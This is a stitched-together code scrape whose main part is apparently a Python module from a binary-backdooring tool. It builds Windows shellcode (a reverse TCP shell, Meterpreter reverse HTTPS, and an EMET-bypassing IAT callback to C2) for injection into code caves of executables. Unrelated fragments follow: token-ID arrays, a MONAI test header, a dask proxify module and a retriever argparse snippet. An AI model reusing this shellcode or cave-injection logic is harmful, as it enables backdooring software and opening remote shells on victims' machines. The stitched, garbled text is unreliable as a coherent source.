"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<H", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT) # PORT
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below to EBX
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD3" # add EBX + EDX
self.shellcode1 += "\xb9" # mov value below to ECX
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD1" # add ECX + EDX
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!H', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
| [
7061,
6,
198,
198,
15269,
357,
66,
8,
2211,
12,
4626,
11,
20700,
10276,
82,
198,
3237,
2489,
10395,
13,
198,
198,
7738,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
17613,
11,
198,
533,
10431,
2810,
326,
2... | 1.536617 | 22,066 |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import numpy as np
import torch
from ignite.engine import Engine
from monai.data import CacheDataset, DataLoader, create_test_image_3d, pad_list_data_collate
from monai.engines.utils import IterationEvents
from monai.handlers import TransformInverter
from monai.transforms import (
AddChanneld,
CastToTyped,
Compose,
LoadImaged,
Orientationd,
RandAffined,
RandAxisFlipd,
RandFlipd,
RandRotate90d,
RandRotated,
RandZoomd,
ResizeWithPadOrCropd,
ScaleIntensityd,
Spacingd,
ToTensord,
)
from monai.utils.misc import set_determinism
from tests.utils import make_nifti_image
KEYS = ["image", "label"]
if __name__ == "__main__":
unittest.main()
| [
2,
15069,
12131,
532,
33448,
25000,
20185,
42727,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921... | 3.020642 | 436 |
import functools
import pydoc
from collections import defaultdict
from functools import partial
from typing import Any, List, MutableMapping
import dask
from dask.utils import Dispatch
from .proxy_object import ProxyObject, asproxy
dispatch = Dispatch(name="proxify_device_objects")
ignore_types = None
def _register_ignore_types():
"""Lazy register types that shouldn't be proxified
It reads the config key "jit-unspill-ignore" (DASK_JIT_UNSPILL_IGNORE),
which should be a comma seperated list of types to ignore. The default
value is:
DASK_JIT_UNSPILL_IGNORE="cupy.ndarray"
Notice, it is not possible to ignore types explicitly handled by this
module such as `cudf.DataFrame`, `cudf.Series`, and `cudf.Index`.
"""
global ignore_types
if ignore_types is not None:
return # Only register once
else:
ignore_types = ()
ignores = dask.config.get("jit-unspill-ignore", "cupy.ndarray")
ignores = ignores.split(",")
toplevels = defaultdict(set)
for path in ignores:
if path:
toplevel = path.split(".", maxsplit=1)[0].strip()
toplevels[toplevel].add(path.strip())
for toplevel, ignores in toplevels.items():
dispatch.register_lazy(toplevel, partial(f, ignores))
def proxify_device_objects(
obj: Any,
proxied_id_to_proxy: MutableMapping[int, ProxyObject] = None,
found_proxies: List[ProxyObject] = None,
excl_proxies: bool = False,
mark_as_explicit_proxies: bool = False,
):
""" Wrap device objects in ProxyObject
Search through `obj` and wraps all CUDA device objects in ProxyObject.
It uses `proxied_id_to_proxy` to make sure that identical CUDA device
objects found in `obj` are wrapped by the same ProxyObject.
Parameters
----------
obj: Any
Object to search through or wrap in a ProxyObject.
proxied_id_to_proxy: MutableMapping[int, ProxyObject]
Dict mapping the id() of proxied objects (CUDA device objects) to
their proxy and is updated with all new proxied objects found in `obj`.
If None, use an empty dict.
found_proxies: List[ProxyObject]
List of found proxies in `obj`. Notice, this includes all proxies found,
including those already in `proxied_id_to_proxy`.
If None, use an empty list.
excl_proxies: bool
Don't add found objects that are already ProxyObject to found_proxies.
mark_as_explicit_proxies: bool
Mark found proxies as "explicit", which means that the user allows them
as input arguments to dask tasks even in compatibility-mode.
Returns
-------
ret: Any
A copy of `obj` where all CUDA device objects are wrapped in ProxyObject
"""
_register_ignore_types()
if proxied_id_to_proxy is None:
proxied_id_to_proxy = {}
if found_proxies is None:
found_proxies = []
ret = dispatch(obj, proxied_id_to_proxy, found_proxies, excl_proxies)
if mark_as_explicit_proxies:
for p in found_proxies:
p._pxy_get().explicit_proxy = True
return ret
def unproxify_device_objects(obj: Any, skip_explicit_proxies: bool = False):
""" Unproxify device objects
Search through `obj` and un-wraps all CUDA device objects.
Parameters
----------
obj: Any
Object to search through or unproxify.
skip_explicit_proxies: bool
When True, skipping proxy objects marked as explicit proxies.
Returns
-------
ret: Any
A copy of `obj` where all CUDA device objects are unproxify
"""
if isinstance(obj, dict):
return {
k: unproxify_device_objects(v, skip_explicit_proxies)
for k, v in obj.items()
}
if isinstance(obj, (list, tuple, set, frozenset)):
return type(obj)(
unproxify_device_objects(i, skip_explicit_proxies) for i in obj
)
if isinstance(obj, ProxyObject):
pxy = obj._pxy_get(copy=True)
if not skip_explicit_proxies or not pxy.explicit_proxy:
pxy.explicit_proxy = False
obj = obj._pxy_deserialize(maybe_evict=False, proxy_detail=pxy)
return obj
def proxify_decorator(func):
"""Returns a function wrapper that explicit proxify the output
Notice, this function only has effect in compatibility mode.
"""
@functools.wraps(func)
return wrapper
def unproxify_decorator(func):
"""Returns a function wrapper that unproxify output
Notice, this function only has effect in compatibility mode.
"""
@functools.wraps(func)
return wrapper
@dispatch.register(object)
@dispatch.register(ProxyObject)
@dispatch.register(list)
@dispatch.register(tuple)
@dispatch.register(set)
@dispatch.register(frozenset)
@dispatch.register(dict)
# Implement cuDF specific proxification
@dispatch.register_lazy("cudf")
| [
11748,
1257,
310,
10141,
198,
11748,
279,
5173,
420,
198,
6738,
17268,
1330,
4277,
11600,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
13859,
540,
44,
5912,
198,
198,
11748,
288,
2093,
198,
6738,... | 2.625737 | 1,865 |
import pytest
from contacts.models import Contacts
from django.urls import reverse
@pytest.mark.django_db | [
11748,
12972,
9288,
198,
6738,
13961,
13,
27530,
1330,
2345,
8656,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
9575,
198,
198,
31,
9078,
9288,
13,
4102,
13,
28241,
14208,
62,
9945
] | 3.3125 | 32 |
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--device",
default="cpu",
type=str,
help="Device to run query encoder, cpu or [cuda:0, cuda:1, ...]",
)
parser.add_argument(
"--dataset_path",
default=None,
type=str,
help="Path to the [dev, test] dataset",
)
parser.add_argument(
"--retriever",
default="bm25",
type=str,
help="define the indexer type",
)
parser.add_argument(
"--k1",
default=0.9,
type=float,
help="k1, parameter for bm25 retriever",
)
parser.add_argument(
"--b",
default=0.4,
type=float,
help="b, parameter for bm25 retriever",
)
parser.add_argument(
"--encoder",
default="facebook/dpr-question_encoder-multiset-base",
type=str,
help="dpr encoder path or name",
)
parser.add_argument(
"--query_tokenizer_name",
default=None,
type=str,
